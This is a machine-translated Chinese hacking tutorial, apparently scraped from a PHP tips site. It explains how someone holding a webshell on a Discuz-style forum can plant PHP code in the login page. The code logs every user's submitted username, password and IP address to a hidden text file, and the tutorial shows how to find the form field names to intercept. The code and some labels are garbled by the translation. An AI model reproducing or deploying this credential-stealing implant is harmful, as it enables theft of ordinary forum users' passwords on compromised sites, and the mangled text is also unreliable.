Get Webshell after, want to further infiltration, such as discuz password, not directly with MD5 encryption, crack difficult. Used to help big head written once, yesterday, the pig brother just used, and wrote again. The code is relatively simple, just a few words, I put the principle of detailed points, take care of PHP do not know a lot of friends. if ($_post[loginsubmit]!=) {//Determine if the login button is clicked $sb=user:.$_post[username].--passwd:.$_post[password].--ip:. $HTTP _server _VARS[REMOTE_ADDR].--. date (y-m-d h:i:s). Rn; Connect the value of the post received to the variable $SB fwrite (fopen (Robot.txt,ab), $SB);} Results write a file below a simple analysis, the Chinese landing page for example. Open bbs.xxx.com/login.php Right-click to view the source code, Ctrl+f Search action to find the landing form. I just copied the key code over here. The value behind the action is the address of the form submission, which will handle the login, for example, the method for determining if the password is correct is post, so receive it with $_post .... Powerful ellipsis ...Account
U):
User name input box, note the value of its name, and $_post[username] the corresponding, so to intercept the Chinese password, need to change to $_post[pwuser]Password
P):
User name input box, note the value of its name, and $_post[username] the corresponding, so to intercept the Chinese password, need to change to $_post[pwpwd]
http://www.bkjia.com/PHPjc/478807.html www.bkjia.com true http://www.bkjia.com/PHPjc/478807.html techarticle get Webshell After, want to further infiltration, such as discuz password, not directly with MD5 encryption, crack difficult. Used to help big head written once, yesterday, the pig brother just used, ...